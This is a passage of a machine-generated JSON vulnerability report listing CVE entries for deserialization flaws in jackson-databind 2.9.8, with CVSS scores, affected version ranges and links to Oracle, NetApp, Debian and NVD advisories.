cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.8"]}],"title":"CVE-2020-36180/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-36185"]}],"cve":"CVE-2020-36185","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:16:02","ids":[{"system_name":"CVE Record","text":"CVE-2020-36185"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210205-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Unsafe Deserialization in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Unsafe Deserialization in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets 
and typing, related to `org.apache.tomcat.dbcp.dbcp2.datasources.SharedPoolDataSource`."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36185"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36185"},{"summary":"NetApp Advisory ntap-20210205-0005","url":"https://security.netapp.com/advisory/ntap-20210205-0005"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory 
cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"]}],"title":"CVE-2020-36185/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-10672"]}],"cve":"CVE-2020-10672","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-04-23T16:32:59","ids":[{"system_name":"CVE Record","text":"CVE-2020-10672"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200403-0002"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jackson-databind mishandles the interaction between serialization gadgets and typing"},{"category":"details","details":"Vulnerability Details","text":"# jackson-databind mishandles the interaction between serialization gadgets and typing FasterXML 
jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory (aka aries.transaction.jms)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.4"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/03/msg00027.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10672"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10672"},{"summary":"NetApp Advisory ntap-20200403-0002","url":"https://security.netapp.com/advisory/ntap-20200403-0002"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory 
cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.8,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.8,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.8,"temporalSeverity":"HIGH","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"]}],"title":"CVE-2020-10672/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-36179"]}],"cve":"CVE-2020-36179","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:15:54","ids":[{"system_name":"CVE Record","text":"CVE-2020-36179"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210205-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Unsafe Deserialization in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Unsafe Deserialization in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 and 2.6.7.5 mishandles the interaction between 
serialization gadgets and typing, related to `oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS`."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc255f41d9a61d3dc79a51fb5c713de4ae10e71e3673feeb0b180b436@%3Cissues.spark.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36179"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36179"},{"summary":"NetApp Advisory ntap-20210205-0005","url":"https://security.netapp.com/advisory/ntap-20210205-0005"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory 
cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.8"]}],"title":"CVE-2020-36179/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-36183"]}],"cve":"CVE-2020-36183","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:16:34","ids":[{"system_name":"CVE Record","text":"CVE-2020-36183"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210205-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Unsafe Deserialization in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Unsafe Deserialization in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 and 2.6.7.5 mishandles the interaction between 
serialization gadgets and typing, related to org.docx4j.org.apache.xalan.lib.sql.JNDIConnectionPool."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.00|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36183"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36183"},{"summary":"NetApp Advisory ntap-20210205-0005","url":"https://security.netapp.com/advisory/ntap-20210205-0005"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory 
cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.00|<2.9.10.8"]}],"title":"CVE-2020-36183/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-11113"]}],"cve":"CVE-2020-11113","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-05-15T18:58:47","ids":[{"system_name":"CVE Record","text":"CVE-2020-11113"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200403-0002"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jackson-databind mishandles the interaction between serialization gadgets and typing"},{"category":"details","details":"Vulnerability Details","text":"# jackson-databind mishandles the interaction between serialization gadgets and typing FasterXML 
jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.openjpa.ee.WASRegistryManagedRuntime (aka openjpa)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.4"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-11113"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-11113"},{"summary":"NetApp Advisory ntap-20200403-0002","url":"https://security.netapp.com/advisory/ntap-20200403-0002"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory 
cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.8,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.8,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.8,"temporalSeverity":"HIGH","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"]}],"title":"CVE-2020-11113/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-14062"]}],"cve":"CVE-2020-14062","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-06-18T14:44:48","ids":[{"system_name":"CVE Record","text":"CVE-2020-14062"},{"system_name":"Snyk Advisory","text":"SNYK-JAVA-COMFASTERXMLJACKSONCORE-570625"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200702-0003"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Deserialization of untrusted data in Jackson Databind"},{"category":"details","details":"Vulnerability 
Details","text":"# Deserialization of untrusted data in Jackson Databind FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool (aka xalan2)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.5"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.5"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/07/msg00001.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-14062"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-14062"},{"summary":"NetApp Advisory ntap-20200702-0003","url":"https://security.netapp.com/advisory/ntap-20200702-0003"},{"summary":"Snyk Advisory SNYK-JAVA-COMFASTERXMLJACKSONCORE-570625","url":"https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-570625"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory 
cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.5"]}],"title":"CVE-2020-14062/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-14061"]}],"cve":"CVE-2020-14061","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-06-18T14:44:50","ids":[{"system_name":"CVE Record","text":"CVE-2020-14061"},{"system_name":"Snyk Advisory","text":"SNYK-JAVA-COMFASTERXMLJACKSONCORE-572316"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200702-0003"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Deserialization of untrusted data in Jackson Databind"},{"category":"details","details":"Vulnerability 
Details","text":"# Deserialization of untrusted data in Jackson Databind FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to oracle.jms.AQjmsQueueConnectionFactory, oracle.jms.AQjmsXATopicConnectionFactory, oracle.jms.AQjmsTopicConnectionFactory, oracle.jms.AQjmsXAQueueConnectionFactory, and oracle.jms.AQjmsXAConnectionFactory (aka weblogic/oracle-aqjms)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.5"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.5"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/07/msg00001.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-14061"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-14061"},{"summary":"NetApp Advisory ntap-20200702-0003","url":"https://security.netapp.com/advisory/ntap-20200702-0003"},{"summary":"Snyk Advisory SNYK-JAVA-COMFASTERXMLJACKSONCORE-572316","url":"https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-572316"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory 
cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.5"]}],"title":"CVE-2020-14061/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-36181"]}],"cve":"CVE-2020-36181","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:16:10","ids":[{"system_name":"CVE Record","text":"CVE-2020-36181"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210205-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Unsafe Deserialization in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Unsafe Deserialization in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 and 2.6.7.5 mishandles the interaction between 
serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.cpdsadapter.DriverAdapterCPDS`."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36181"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36181"},{"summary":"NetApp Advisory ntap-20210205-0005","url":"https://security.netapp.com/advisory/ntap-20210205-0005"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory 
cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.8"]}],"title":"CVE-2020-36181/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-36188"]}],"cve":"CVE-2020-36188","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:16:42","ids":[{"system_name":"CVE Record","text":"CVE-2020-36188"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210205-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Unsafe Deserialization in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Unsafe Deserialization in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 and 2.6.7.5 mishandles the interaction between 
